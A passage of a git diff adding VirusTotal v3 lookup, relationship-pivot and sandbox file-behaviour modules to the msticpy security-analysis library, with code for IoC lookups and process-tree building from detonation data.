+    "contacted_ips": VTAPIScope.PUBLIC,
+    "downloaded_files": VTAPIScope.PRIVATE,
+    "redirecting_urls": VTAPIScope.PRIVATE,
+    "redirects_to": VTAPIScope.PRIVATE,
+    "referrer_files": VTAPIScope.PRIVATE,
+    "referrer_urls": VTAPIScope.PRIVATE,
+}
+
+PIVOT_ENTITY_CATS: Dict[str, Tuple[str, Dict[str, VTAPIScope]]] = {
+    "File": ("file", FILE_RELATIONSHIPS),
+    "IpAddress": ("ip_address", IP_RELATIONSHIPS),
+    "Dns": ("domain", DOMAIN_RELATIONSHIPS),
+    "Url": ("url", URL_RELATIONSHIPS),
+}
+
+_ENTITY_PROPS = {
+    "File": "Sha256",
+    "IpAddress": "Address",
+    "Dns": "DomainName",
+    "Url": "Url",
+}
+
+
+# pylint: disable=no-member
+def add_pivot_functions(api_scope: Optional[str] = None):
+    """
+    Add VT3 relationship functions as pivot functions.
+
+    Parameters
+    ----------
+    api_scope : Optional[str], optional
+        "public" or "private", by default "public"
+
+    """
+    ent_funcs = _create_pivots(api_scope)
+    for entity, funcs in ent_funcs.items():
+        for func_name, func in funcs.items():
+            pivot_reg = PivotRegistration(
+                func_new_name=func_name,
+                input_type="value",
+                entity_map={entity: _ENTITY_PROPS[entity]},
+                func_input_value_arg="entity_id",
+                can_iterate=True,
+                create_shortcut=True,
+            )
+            Pivot.add_pivot_function(func, pivot_reg=pivot_reg, container="VT")
+
+
+# pylint: disable=no-member
+def _create_pivots(api_scope: Union[str, VTAPIScope, None]):
+    if api_scope is None:
+        scope = _get_vt_api_scope()
+    elif isinstance(api_scope, str):
+        scope = enum_parse(VTAPIScope, api_scope) or VTAPIScope.PUBLIC
+    else:
+        scope = api_scope
+    vt_client = VTLookupV3()
+
+    if not isinstance(scope, VTAPIScope):
+        # pylint: disable=not-an-iterable
+        scope_names = [f"{name.lower()}" for name in VTAPIScope.__members__]
+        raise ValueError(
+            f"Unknown API scope {api_scope}",
+            f"Valid values are {', '.join(scope_names)}",
+        )
+
+    if scope == VTAPIScope.PRIVATE:
+        scope = VTAPIScope.ALL
+    ent_funcs = {}
+    for entity, (vt_type, category) in PIVOT_ENTITY_CATS.items():
+        ent_relations = (
+            rel for rel, rel_scope in category.items() if rel_scope & scope
+        )
+        func_dict = {}
+        for relationship in ent_relations:
+            f_part = partial(
+                _get_relationships,
+                vt_client=vt_client,
+                vt_type=vt_type,
+                relationship=relationship,
+            )
+            func_dict[_create_func_name(relationship)] = f_part
+        ent_funcs[entity] = func_dict
+    return ent_funcs
+
+
+# pylint: enable=no-member
+
+
+def _create_func_name(relationship):
+    return f"vt_{relationship}"
+
+
+def _get_relationships(vt_client, entity_id, vt_type, relationship):
+    result_df = vt_client.lookup_ioc_relationships(
+        observable=entity_id, vt_type=vt_type, relationship=relationship
+    )
+    return result_df.reset_index()
+
+
+def _get_vt_api_scope() -> VTAPIScope:
+    """Retrieve the VT enterprise key from settings."""
+    prov_settings = get_provider_settings("TIProviders")
+    vt_settings = prov_settings.get("VirusTotal")
+    if vt_settings:
+        return (
+            VTAPIScope.PRIVATE
+            if vt_settings.args.get("UseVT3PrivateAPI", False)
+            else VTAPIScope.PUBLIC
+        )
+    return VTAPIScope.PUBLIC
diff --git a/msticpy/sectools/vtlookupv3/vtfile_behavior.py b/msticpy/sectools/vtlookupv3/vtfile_behavior.py
new file mode 100644
index 000000000..cde8fea41
--- /dev/null
+++ b/msticpy/sectools/vtlookupv3/vtfile_behavior.py
@@ -0,0 +1,458 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""VirusTotal File Behavior functions."""
+from copy import deepcopy
+from datetime import datetime
+from pathlib import Path
+from pprint import pformat
+import re
+from typing import Any, Dict, List, Optional, Union
+
+import attr
+import ipywidgets as widgets
+import numpy as np
+import pandas as pd
+
+from ..._version import VERSION
+
+from ...common.exceptions import MsticpyImportExtraError, MsticpyUserError
+from ...nbtools.process_tree import plot_process_tree
+from ..proc_tree_builder import ProcSchema, build_proc_tree
+
+try:
+    import vt
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without vt-py and vt-graph-api packages installed.",
+        title="Error importing VirusTotal modules.",
+        extra="vt3",
+    ) from imp_err
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+VT_API_NOT_FOUND = "NotFoundError"
+
+
+_FB_CAT_PATTERNS = {
+    "File": "file.*",
+    "Process": "process.*|command.*|module.*",
+    "Registry": "registry.*",
+    "Network": ".*ips|dns.*|.*urls|ip.*|http.*|tls",
+    "System": "mutex.*|calls.*|permissions.*|text.*",
+    "Other": ".*",
+}
+
+_BORDER_LAYOUT = widgets.Layout(
+    **{
+        "width": "90%",
+        "border": "solid gray 1px",
+        "margin": "1pt",
+        "padding": "5pt",
+    }
+)
+
+
+class VTFileBehavior:
+    """VirusTotal File Behavior class."""
+
+    _SANDBOXES = [
+        "f_secure_sandbox",
+        "bitdam_atp",
+        "vmray",
+        "virustotal_zenbox",
+        "sangfor_zsand",
+        "virustotal_jujubox",
+        "qianxin_reddrip",
+        "nsfocus_poma",
+        "virustotal_androbox",
+        "venuseye_sandbox",
+        "cyber_adapt",
+        "dr_web_vxcube",
+        "virustotal_observer",
+        "tencent_habo",
+        "yomi_hunter",
+        "virustotal_jsbox",
+        "virustotal_cuckoofork",
+        "lastline",
+        "reaqta_hive",
+        "os_x_sandbox",
+        "virustotal_droidy",
+        "sndbox",
+        "virustotal_r2dbox",
+        "rising_moves",
+        "virustotal_box_of_apples",
+        "secondwrite",
+        "malwation",
+        "c2ae",
+        "microsoft_sysinternals",
+    ]
+
+    _FP_ENDPOINTS = {
+        "summary": "/files/{id}/behaviour_summary",
+        "sandbox": "/file_behaviours/{id}_{sandbox}",
+        "evtx": "/file_behaviours/{sandbox_id}/evtx",
+        "pcap": "/file_behaviours/{sandbox_id}/pcap",
+        "memdump": "/file_behaviours/{sandbox_id}/memdump",
+    }
+
+    @classmethod
+    def list_sandboxes(cls) -> List[str]:
+        """Return list of known sandbox types."""
+        return list(cls._SANDBOXES)
+
+    def __init__(
+        self,
+        vt_key: str = None,
+        file_id: Optional[str] = None,
+        file_summary: Optional[Union[pd.DataFrame, pd.Series, Dict[str, Any]]] = None,
+    ):
+        """
+        Initialize the VTFileBehavior class.
+
+        Parameters
+        ----------
+        vt_key : str, optional
+            VirusTotal API key, by default None
+        file_id : Optional[str], optional
+            The ID of the file to look up, by default None
+        file_summary : Optional[Union[pd.DataFrame, pd, Series, Dict[str, Any]]], optional
+            VT file summary - this can be in one of the following formats:
+            VT object dictionary
+            Pandas DataFrame - first row is assumed to be the file summary
+            Pandas Series
+            by default None
+
+        """
+        self._vt_client = vt.Client(apikey=vt_key)
+        if file_id is None and file_summary is None:
+            raise MsticpyUserError(
+                "You must supply either a file_id or a file_summary.",
+                title="Missing required parameter.",
+            )
+
+        if isinstance(file_summary, pd.DataFrame):
+            file_summary = file_summary.iloc[0]
+        if isinstance(file_summary, pd.Series):
+            file_summary = file_summary.to_dict()
+        self.file_summary = file_summary or {}  # type: ignore
+        self.file_id = file_id or self.file_summary.get("id")
+
+        self._file_behavior: Dict[str, Any] = {}
+        self.categories: Dict[str, Any] = {}
+        self.behavior_links: Dict[str, Any] = {}
+        self.process_tree_df: Optional[pd.DataFrame] = None
+
+    def _reset_summary(self):
+        self._file_behavior: Dict[str, Any] = {}
+        self.categories: Dict[str, Any] = {}
+        self.process_tree_df: Optional[pd.DataFrame] = None
+
+    @property
+    def sandbox_id(self) -> str:
+        """Return sandbox ID of detonation."""
+        return self.categories.get("id", "")
+
+    @property
+    def has_evtx(self) -> bool:
+        """Return True if EVTX data is available (Enterprise only)."""
+        return self.categories.get("has_evtx", False)
+
+    @property
+    def has_memdump(self) -> bool:
+        """Return True if memory dump data is available (Enterprise only)."""
+        return self.categories.get("has_memdump", False)
+
+    @property
+    def has_pcap(self) -> bool:
+        """Return True if PCAP data is available (Enterprise only)."""
+        return self.categories.get("has_pcap", False)
+
+    def get_file_behavior(self, sandbox: str = None):
+        """
+        Retrieve the file behavior data.
+
+        Parameters
+        ----------
+        sandbox : str, optional
+            Name of specific sandbox to retrieve, by default None
+            If None, it will retrieve the behavior summary.
+
+        """
+        if sandbox:
+            endpoint = self._FP_ENDPOINTS["sandbox"].format(
+                id=self.file_id,
+                sandbox=sandbox,
+            )
+        else:
+            endpoint = self._FP_ENDPOINTS["summary"].format(id=self.file_id)
+
+        try:
+            self._file_behavior = self._vt_client.get_data(endpoint)
+        except vt.APIError as err:
+            if err.args and err.args[0] == VT_API_NOT_FOUND:
+                self._file_behavior = {"id": self.file_id, "result": VT_API_NOT_FOUND}
+                return
+            raise
+        finally:
+            self._vt_client.close()
+
+        if "attributes" in self._file_behavior:
+            self.categories = self._file_behavior.get("attributes", {})
+            self.behavior_links = self._file_behavior.get("links", {})
+        else:
+            self.categories = self._file_behavior
+
+    def browse(self) -> Optional[widgets.VBox]:
+        """Browse the behavior categories."""
+        if not self.has_behavior_data:
+            self._print_no_data()
+            return None
+        groupings = {}
+        remaining_categories = set(self.categories)
+        for name, pattern in _FB_CAT_PATTERNS.items():
+            groupings[name] = _extract_subcats(pattern, remaining_categories)
+            remaining_categories = remaining_categories - groupings[name]
+
+        accordion = widgets.Accordion()
+        child_tabs = {}
+        for group, sub_cats in groupings.items():
+
+            sub_cat_tab = widgets.Tab()
+            tab_content = {
+                section: widgets.HTML(value=_format_widget_data(items))
+                for section, items in self.categories.items()
+                if items and section in sub_cats
+            }
+            sub_cat_tab.children = list(tab_content.values())
+            for idx, section in enumerate(tab_content):
+                sub_cat_tab.set_title(idx, section)
+            child_tabs[group] = sub_cat_tab
+
+        accordion.children = list(child_tabs.values())
+        for idx, group_name in enumerate(child_tabs):
+            accordion.set_title(idx, group_name)
+        accordion.selected_index = 0
+
+        html_title = widgets.HTML(
+            ("<h2>VirusTotal Detonation Details</h2>" f"For file {self.file_id}"),
+            layout=_BORDER_LAYOUT,
+        )
+        return widgets.VBox([html_title, accordion])
+
+    @property
+    def process_tree(self) -> Any:
+        """Return the process tree plot."""
+        if not self.has_behavior_data:
+            self._print_no_data()
+            return None
+        if self.process_tree_df is None:
+            self.process_tree_df = _build_process_tree(self.categories)
+        plot, _ = plot_process_tree(
+            data=self.process_tree_df,
+            schema=VT_PROCSCHEMA,
+            legend_col="name",
+            hide_legend=True,
+        )
+        return plot
+
+    @property
+    def has_behavior_data(self) -> bool:
+        """Return true if file behavior data available."""
+        return bool(self.categories)
+
+    def _print_no_data(self):
+        """Print a message if operation is tried with no data."""
+        print(f"No data available for {self.file_id}.")
+
+
+# Process tree extraction
+
+
+# pylint: disable=too-few-public-methods
+@attr.s(auto_attribs=True)
+class SIProcess:
+    """Data class to hold each process from detonation."""
+
+    process_id: str
+    name: str
+    cmd_line: str
+    parent_id: int = -1
+    proc_key: Optional[str] = None
+    parent_key: Optional[str] = None
+    path: Optional[str] = None
+    IsRoot: bool = False
+    IsLeaf: bool = False
+    IsBranch: bool = False
+    children: list = []
+    # proc_children: list = []
+    time_offset: int = 0
+
+
+# pylint: enable=too-few-public-methods
+
+
+VT_PROCSCHEMA = ProcSchema(
+    **{
+        "process_name": "name",
+        "process_id": "process_id",
+        "parent_id": "parent_id",
+        "cmd_line": "cmd_line",
+        "time_stamp": "time_stamp",
+        "logon_id": "logon_id",
+        "path_separator": "\\",
+        "user_name": "user_name",
+        "host_name_column": "host",
+        "event_id_column": "event_id",
+    }
+)
+
+
+def _build_process_tree(fb_categories):
+    """Top level function to create displayable DataFrame."""
+    proc_tree_raw = deepcopy(fb_categories["processes_tree"])
+    procs_created = {
+        Path(proc).parts[-1].lower(): proc
+        for proc in fb_categories["processes_created"]
+    }
+
+    si_procs = _extract_processes(proc_tree_raw, procs_created)
+    process_tree_df = pd.DataFrame(_procs_to_df(si_procs)).drop(columns="children")
+    process_tree_df = _try_match_commandlines(
+        fb_categories["command_executions"], process_tree_df
+    )
+    return _fill_missing_proc_tree_values(process_tree_df)
+
+
+def _extract_processes(process_data, procs_created, parent=None):
+    """Convert processes_tree attribute to SIProcessObjects."""
+    procs = []
+    for process in process_data:
+        si_proc = _create_si_proc(process, procs_created)
+        # pylint: disable=invalid-name
+        if parent:
+            si_proc.parent_key = parent.proc_key
+            si_proc.IsBranch = True
+        else:
+            si_proc.IsRoot = True
+        child_procs_raw = process.get("children", [])
+        if child_procs_raw:
+            si_proc.children = _extract_processes(
+                child_procs_raw, procs_created, parent=si_proc
+            )
+        else:
+            si_proc.IsLeaf = True
+            si_proc.IsBranch = False
+        procs.append(si_proc)
+    return procs
+
+
+def _create_si_proc(raw_proc, procs_created):
+    """Return an SIProcess Object from a raw VT proc definition."""
+    # raw_proc = copy(raw_proc)
+    name = raw_proc.get("name")
+    raw_proc["cmd_line"] = name
+    for proc in procs_created:
+        if name.lower().endswith(proc):
+            raw_proc["name"] = procs_created[proc]
+            break
+    raw_proc["proc_key"] = raw_proc["process_id"] + "|" + raw_proc["name"]
+    # print(name, raw_proc.keys())
+    return SIProcess(**raw_proc)
+
+
+# Convert to DF
+def _procs_to_df(procs):
+    """Convert the SIProcess objects recursively to a list."""
+    df_list = []
+    for proc in procs:
+        df_list.append(attr.asdict(proc))
+        if proc.children:
+            df_list.extend(_procs_to_df(proc.children))
+    return df_list
+
+
+# Try to Match up 'command_executions' commandline data with
+# process_df.
+def _try_match_commandlines(
+    command_executions, procs_cmds: pd.DataFrame
+) -> pd.DataFrame:
+    """Return DF with matched commandlines."""
+    procs_cmd = procs_cmds.copy()
+    procs_cmd["cmd_line"] = np.nan
+    weak_matches = 0
+    for cmd in command_executions:
+        for idx, row in procs_cmd.iterrows():
+            # print(row["name"], cmd, row["cmd_line"], isinstance(row["cmd_line"], str))
+            if (
+                not isinstance(row["cmd_line"], str)
+                and np.isnan(row["cmd_line"])
+                and row["name"] in cmd
+            ):
+                # print("Found match:", row["name"], "==", cmd)
+                procs_cmd.loc[idx, "cmd_line"] = cmd
+                break
+    for cmd in command_executions:
+        for idx, row in procs_cmd.iterrows():
+            # print(row["name"], cmd, row["cmd_line"], isinstance(row["cmd_line"], str))
+            if (
+                not isinstance(row["cmd_line"], str)
+                and np.isnan(row["cmd_line"])
+                and Path(row["name"]).stem.lower() in cmd.lower()
+            ):
+                weak_matches += 1
+                # print("Found weak match:", row["name"], "~=", cmd)
+                procs_cmd.loc[idx, "cmd_line"] = cmd
+                break
+
+    if weak_matches:
+        print(
+            f"WARNING: {weak_matches} of the {len(command_executions)} commandlines",
+            "were weakly matched - some commandlines may be attributed",
+            "to the wrong instance of the process.",
+            end="\n",
+        )
+    return procs_cmd
+
+
+def _fill_missing_proc_tree_values(process_df: pd.DataFrame) -> pd.DataFrame:
+    # Define a schema to map Df names on to internal ProcSchema
+    process_df["path"] = np.nan
+    process_df.loc[process_df.IsRoot, "path"] = process_df[
+        process_df.IsRoot
+    ].index.astype("str")
+
+    # Fill in some required fields with placeholder data
+    process_df["time_stamp"] = datetime.utcnow()
+    process_df["host"] = "sandbox"
+    process_df["logon_id"] = "na"
+    process_df["event_id"] = "na"
+    process_df["source_index"] = process_df.index.astype("str")
+
+    proc_tree = process_df.set_index("proc_key")
+
+    first_unique = proc_tree.index.duplicated()
+    proc_tree = proc_tree[~first_unique]
+    # msticpy function to build the tree
+    return build_proc_tree(proc_tree)
+
+
+# Process browser helper functions
+def _extract_subcats(pattern, categs):
+    """Extract the category names matching `pattern`."""
+    return {cat for cat in categs if re.match(pattern, cat)}
+
+
+def _format_widget_data(data_item):
+    if not data_item:
+        return ""
+    if isinstance(data_item, list):
+        if isinstance(data_item[0], dict):
+            return pd.DataFrame(data_item).style.hide_index().render()
+        if isinstance(data_item[0], str):
+            return pd.DataFrame(pd.Series(data_item)).style.hide_index().render()
+    return f"<pre>{pformat(data_item)}</pre>"
diff --git a/msticpy/sectools/vtlookupv3/vtlookupv3.py b/msticpy/sectools/vtlookupv3/vtlookupv3.py
new file mode 100644
index 000000000..adf79ba05
--- /dev/null
+++ b/msticpy/sectools/vtlookupv3/vtlookupv3.py
@@ -0,0 +1,1005 @@
+"""VirusTotal v3 API."""
+import asyncio
+from enum import Enum
+from typing import Any, Dict, List, Optional, Set, Tuple
+
+import pandas as pd
+from IPython.display import HTML, display
+
+from ...common.exceptions import MsticpyImportExtraError
+from ...common.utility import is_ipython
+from ...common.provider_settings import get_provider_settings
+
+try:
+    import vt
+
+    # Removing dependency temporarily due to build break
+    # from vt_graph_api import VTGraph
+    # from vt_graph_api import errors as vt_graph_errs
+    import nest_asyncio
+    from .vtfile_behavior import VTFileBehavior
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without vt-py, vt-graph-api and",
+        "nest_asyncio packages installed.",
+        title="Error importing VirusTotal modules.",
+        extra="vt3",
+    ) from imp_err
+
+
+# pylint: disable=too-many-lines
+
+
+class MsticpyVTNoDataError(Exception):
+    """No data returned from VT API."""
+
+
+class MsticpyVTGraphSaveGraphError(Exception):
+    """Could not save VT Graph."""
+
+
+class VTEntityType(Enum):
+    """VTEntityType: Enum class for VirusTotal entity types."""
+
+    FILE = "file"
+    DOMAIN = "domain"
+    IP_ADDRESS = "ip_address"
+    URL = "url"
+
+
+class ColumnNames(Enum):
+    """Column name enum for DataFrame output."""
+
+    ID = "id"
+    TYPE = "type"
+    DETECTIONS = "detections"
+    SCANS = "scans"
+    SOURCE = "source"
+    TARGET = "target"
+    RELATIONSHIP_TYPE = "relationship_type"
+    SOURCE_TYPE = "source_type"
+    TARGET_TYPE = "target_type"
+
+
+class VTObjectProperties(Enum):
+    """Enum for VT Object properties."""
+
+    ATTRIBUTES = "attributes"
+    RELATIONSHIPS = "relationship"
+    LAST_ANALYSIS_STATS = "last_analysis_stats"
+    MALICIOUS = "malicious"
+
+
+def _make_sync(future):
+    """Wait for an async call, making it sync."""
+    try:
+        event_loop = asyncio.get_event_loop()
+    except RuntimeError:
+        # Generate an event loop if there isn't any.
+        event_loop = asyncio.new_event_loop()
+        asyncio.set_event_loop(event_loop)
+    return event_loop.run_until_complete(future)
+
+
+VT_API_NOT_FOUND = "NotFoundError"
+
+
+class VTLookupV3:
+    """VTLookupV3: VirusTotal lookup of IoC reports."""
+
+    _SUPPORTED_VT_TYPES: Set[VTEntityType] = {
+        VTEntityType.FILE,
+        VTEntityType.URL,
+        VTEntityType.IP_ADDRESS,
+        VTEntityType.DOMAIN,
+    }
+
+    _MAPPING_TYPES_ENDPOINT: Dict[VTEntityType, str] = {
+        VTEntityType.FILE: "files",
+        VTEntityType.URL: "urls",
+        VTEntityType.IP_ADDRESS: "ip_addresses",
+        VTEntityType.DOMAIN: "domains",
+    }
+
+    _BASIC_PROPERTIES_PER_TYPE: Dict[VTEntityType, Set[str]] = {
+        VTEntityType.FILE: {
+            "type_description",
+            "size",
+            "first_submission_date",
+            "last_submission_date",
+            "times_submitted",
+            "meaningful_name",
+        },
+        VTEntityType.URL: {
+            "first_submission_date",
+            "last_submission_date",
+            "times_submitted",
+        },
+        VTEntityType.IP_ADDRESS: {"date", "country", "asn", "as_owner"},
+        VTEntityType.DOMAIN: {"id", "creation_date", "last_update_date", "country"},
+    }
+
+    @property
+    def supported_vt_types(self) -> List[str]:
+        """
+        Return list of VirusTotal supported IoC type names.
+
+        Returns
+        -------
+        List[str]:
+            List of VirusTotal supported IoC type names.
+
+        """
+        return [str(i_type) for i_type in self._SUPPORTED_VT_TYPES]
+
+    @classmethod
+    def _get_endpoint_name(cls, vt_type: str) -> str:
+        if VTEntityType(vt_type) not in cls._SUPPORTED_VT_TYPES:
+            raise KeyError(f"Property type {vt_type} not supported")
+
+        return cls._MAPPING_TYPES_ENDPOINT[VTEntityType(vt_type)]
+
+    @classmethod
+    def _parse_vt_object(
+        cls, vt_object: vt.object.Object, all_props: bool = False
+    ) -> pd.DataFrame:
+        obj_dict = vt_object.to_dict()
+        if VTObjectProperties.ATTRIBUTES.value in obj_dict:
+            attributes = obj_dict[VTObjectProperties.ATTRIBUTES.value]
+            vt_type = VTEntityType(vt_object.type)
+            if vt_type not in cls._SUPPORTED_VT_TYPES:
+                raise KeyError(f"Property type {vt_type} not supported")
+            if not all_props:
+                obj = {
+                    key: attributes[key]
+                    for key in cls._BASIC_PROPERTIES_PER_TYPE[vt_type]
+                    if key in attributes
+                }
+            else:
+                obj = attributes
+            vt_df = pd.json_normalize(data=[obj])
+            last_analysis_stats = attributes.get(
+                VTObjectProperties.LAST_ANALYSIS_STATS.value
+            )
+            if last_analysis_stats:
+                vt_df[ColumnNames.DETECTIONS.value] = last_analysis_stats[
+                    VTObjectProperties.MALICIOUS.value
+                ]
+                vt_df[ColumnNames.SCANS.value] = sum(last_analysis_stats.values())
+            # Format dates for pandas
+            vt_df = timestamps_to_utcdate(vt_df)
+        elif obj_dict:
+            vt_df = pd.json_normalize([obj_dict])
+        else:
+            vt_df = cls._item_not_found_df(
+                vt_type=vt_object.type, observable=vt_object.id
+            )
+
+        # Inject ID and Type columns
+        if ColumnNames.ID.value not in vt_df.columns:
+            vt_df[ColumnNames.ID.value] = [vt_object.id]
+        if ColumnNames.TYPE.value not in vt_df.columns:
+            vt_df[ColumnNames.TYPE.value] = [vt_object.type]
+        return vt_df  # .set_index([ColumnNames.ID.value])
+
+    def __init__(self, vt_key: Optional[str] = None):
+        """
+        Create a new instance of VTLookupV3 class.
+
+        Parameters
+        ----------
+        vt_key: str, optional
+            VirusTotal API key, if not supplied, this is read from
+            user configuration.
+
+        """
+        self._vt_key = vt_key or _get_vt_api_key()
+        self._vt_client = vt.Client(apikey=self._vt_key)
+        if is_ipython():
+            nest_asyncio.apply()
+
+    async def _lookup_ioc_async(
+        self, observable: str, vt_type: str, all_props: bool = False
+    ) -> pd.DataFrame:
+        """
+        Look up and single IoC observable.
+
+        Parameters
+        ----------
+        observable: str
+            The observable value
+        vt_type: str
+            The VT entity type
+        all_props : bool, optional
+            If True, return all properties, by default False
+
+        Returns
+        -------
+            Attributes Pandas DataFrame with the properties of the entity
+
+        Raises
+        ------
+        KeyError
+            Unknown vt_type
+
+        """
+        if VTEntityType(vt_type) not in self._SUPPORTED_VT_TYPES:
+            # pylint: disable=no-member
+            raise KeyError(
+                f"Property type {vt_type} not supported",
+                "Valid types are",
+                ", ".join(x.value for x in VTEntityType.__members__.values()),
+            )
+            # pylint: enable=no-member
+
+        endpoint_name = self._get_endpoint_name(vt_type)
+        try:
+            response = self._vt_client.get_object(f"/{endpoint_name}/{observable}")
+            return self._parse_vt_object(response, all_props=all_props)
+        except vt.APIError as err:
+            if err.args and err.args[0] == VT_API_NOT_FOUND:
+                return self._item_not_found_df(vt_type, observable)
+            raise MsticpyVTNoDataError(
+                "An error occurred requesting data from VirusTotal"
+            ) from err
+
+    def lookup_ioc(
+        self, observable: str, vt_type: str, all_props: bool = False
+    ) -> pd.DataFrame:
+        """
+        Look up and single IoC observable.
+
+        Parameters
+        ----------
+        observable: str
+            The observable value
+        vt_type: str
+            The VT entity type
+        all_props : bool, optional
+            If True, return all properties, by default False
+
+        Returns
+        -------
+            Attributes Pandas DataFrame with the properties of the entity
+
+        Raises
+        ------
+        KeyError
+            Unknown vt_type
+
+        """
+        try:
+            return _make_sync(
+                self._lookup_ioc_async(observable, vt_type, all_props=all_props)
+            )
+        finally:
+            self._vt_client.close()
+
+    async def _lookup_iocs_async(
+        self,
+        observables_df: pd.DataFrame,
+        observable_column: str = ColumnNames.TARGET.value,
+        observable_type_column: str = ColumnNames.TARGET_TYPE.value,
+        all_props: bool = False,
+    ):
+        """
+        Look up and multiple IoC observables.
+
+        Parameters
+        ----------
+        observables_df: pd.DataFrame
+            A Pandas DataFrame, where each row is an observable
+        observable_column:
+            ID column of each observable
+        observable_type_column:
+            Type column of each observable
+        all_props : bool, optional
+            If True, return all properties, by default False
+
+        Returns
+        -------
+            Future Attributes Pandas DataFrame with the properties of the entities
+
+        Raises
+        ------
+        KeyError
+            Column not found in observables_df
+
+        """
+        _observables_df = observables_df.reset_index()
+
+        for column in [observable_column, observable_type_column]:
+            if column not in _observables_df.columns:
+                raise KeyError(f"Column {column} not found in observables_df")
+
+        observables_list = _observables_df[observable_column]
+        types_list = _observables_df[observable_type_column]
+        dfs_futures = []
+        for observable, observable_type in zip(observables_list, types_list):
+            try:
+                ioc_df_future = self._lookup_ioc_async(
+                    observable, observable_type, all_props=all_props
+                )
+                dfs_futures.append(ioc_df_future)
+            except KeyError:
+                print(
+                    "ERROR\t It was not possible to obtain results for",
+                    f"{observable_type} {observable}",
+                )
+        dfs = await asyncio.gather(*dfs_futures)
+        return (
+            pd.concat(dfs)
+            if dfs
+            else self._item_not_found_df(
+                vt_type=", ".join(types_list),
+                observable=", ".join(observables_list),
+            )
+        )
+
+    def lookup_iocs(
+        self,
+        observables_df: pd.DataFrame,
+        observable_column: str = ColumnNames.TARGET.value,
+        observable_type_column: str = ColumnNames.TARGET_TYPE.value,
+        all_props: bool = False,
+    ):
+        """
+        Look up and multiple IoC observables.
+
+        Parameters
+        ----------
+        observables_df: pd.DataFrame
+            A Pandas DataFrame, where each row is an observable
+        observable_column:
+            ID column of each observable
+        observable_type_column:
+            Type column of each observable
+        all_props : bool, optional
+            If True, return all properties, by default False
+
+        Returns
+        -------
+            Attributes Pandas DataFrame with the properties of the entities
+
+        """
+        try:
+            return _make_sync(
+                self._lookup_iocs_async(
+                    observables_df,
+                    observable_column,
+                    observable_type_column,
+                    all_props=all_props,
+                )
+            )
+        finally:
+            self._vt_client.close()
+
+    async def _lookup_ioc_relationships_async(
+        self,
+        observable: str,
+        vt_type: str,
+        relationship: str,
+        limit: int = None,
+        all_props: bool = False,
+        full_objects: bool = False,
+    ):
+        """
+        Look up and single IoC observable relationships.
+
+        Parameters
+        ----------
+        observable: str
+            The observable value
+        vt_type: str
+            The VT entity type
+        relationship: str
+            Desired relationship
+        limit: int
+            Relations limit
+        all_props : bool, optional
+            If True, return all properties, by default False
+        full_objects : bool, optional
+            If True, return the full object rather than just ID links.
+
+        Returns
+        -------
+            Future Relationship Pandas DataFrame with the relationships of the entity
+
+        Raises
+        ------
+        KeyError
+            Unknown vt_type
+
+        """
+        if VTEntityType(vt_type) not in self._SUPPORTED_VT_TYPES:
+            raise KeyError(f"Property type {vt_type} not supported")
+
+        endpoint_name = self._get_endpoint_name(vt_type)
+        response: vt.object.Object
+
+        if limit is None:
+            try:
+                response = self._vt_client.get_object(
+                    f"/{endpoint_name}/{observable}?relationship_counters=true"
+                )
+                relationships = response.relationships
+                limit = (
+                    relationships[relationship]["meta"]["count"]
+                    if relationship in relationships
+                    else 0
+                )
+            except KeyError:
+                print(
+                    f"ERROR: Could not obtain relationship limit for {vt_type} {observable}"
+                )
+                return self._item_not_found_df(vt_type=vt_type, observable=observable)
+
+        if limit == 0 or limit is None:
+            return self._item_not_found_df(vt_type=vt_type, observable=observable)
+
+        obj_relation_type = (
+            f"{relationship}" if full_objects else f"relationships/{relationship}"
+        )
+        try:
+            # print(f"Obtaining {limit} relationships for {vt_type} {observable}")
+            response = self._vt_client.iterator(
+                f"/{endpoint_name}/{observable}/{obj_relation_type}",
+                batch_size=40,
+                limit=limit,
+            )
+            vt_objects = [
+                self._parse_vt_object(r, all_props=all_props) for r in response
+            ]
+            result_df = (
+                pd.concat(vt_objects, ignore_index=True)
+                if vt_objects
+                else self._relation_not_found_df(
+                    vt_type=vt_type, observable=observable, relationship=relationship
+                )
+            )
+
+            if vt_objects:
+                # Inject source and target columns
+                result_df[ColumnNames.SOURCE.value] = observable
+                result_df[ColumnNames.SOURCE_TYPE.value] = VTEntityType(vt_type).value
+                result_df[ColumnNames.RELATIONSHIP_TYPE.value] = relationship
+                result_df.reset_index(inplace=True)
+                result_df.rename(
+                    columns={
+                        ColumnNames.ID.value: ColumnNames.TARGET.value,
+                        ColumnNames.TYPE.value: ColumnNames.TARGET_TYPE.value,
+                    },
+                    inplace=True,
+                )
+                # result_df.set_index(
+                #     [ColumnNames.SOURCE.value, ColumnNames.TARGET.value], inplace=True
+                # )
+                # if "index" in result_df.columns:
+                #     result_df.drop(columns=["index"], inplace=True)
+        except vt.APIError as err:
+            if err.args and err.args[0] == VT_API_NOT_FOUND:
+                return self._relation_not_found_df(vt_type, observable, relationship)
+            raise MsticpyVTNoDataError(
+                "An error occurred requesting data from VirusTotal"
+            ) from err
+
+        return result_df
+
+    def lookup_ioc_relationships(
+        self,
+        observable: str,
+        vt_type: str,
+        relationship: str,
+        limit: int = None,
+        all_props: bool = False,
+    ) -> pd.DataFrame:
+        """
+        Look up single IoC observable relationship links.
+
+        Parameters
+        ----------
+        observable: str
+            The observable value
+        vt_type: str
+            The VT entity type
+        relationship: str
+            Desired relationship
+        limit: int
+            Relations limit
+        all_props : bool, optional
+            If True, return all properties, by default False
+
+        Returns
+        -------
+            Relationship Pandas DataFrame with the relationships of the entity
+
+        Notes
+        -----
+        This method returns relationship links rather than whole objects.
+        That is, it will return the IDs of related items in the specified
+        `relationship`, if any.
+
+        See Also
+        --------
+        lookup_ioc_related : return the full related objects.
+
+        """
+        try:
+            return _make_sync(
+                self._lookup_ioc_relationships_async(
+                    observable, vt_type, relationship, limit, all_props=all_props
+                )
+            )
+        finally:
+            self._vt_client.close()
+
+    def lookup_ioc_related(
+        self, observable: str, vt_type: str, relationship: str, limit: int = None
+    ) -> pd.DataFrame:
+        """
+        Look single IoC observable related items.
+
+        Parameters
+        ----------
+        observable: str
+            The observable value
+        vt_type: str
+            The VT entity type
+        relationship: str
+            Desired relationship
+        limit: int
+            Relations limit
+
+        Returns
+        -------
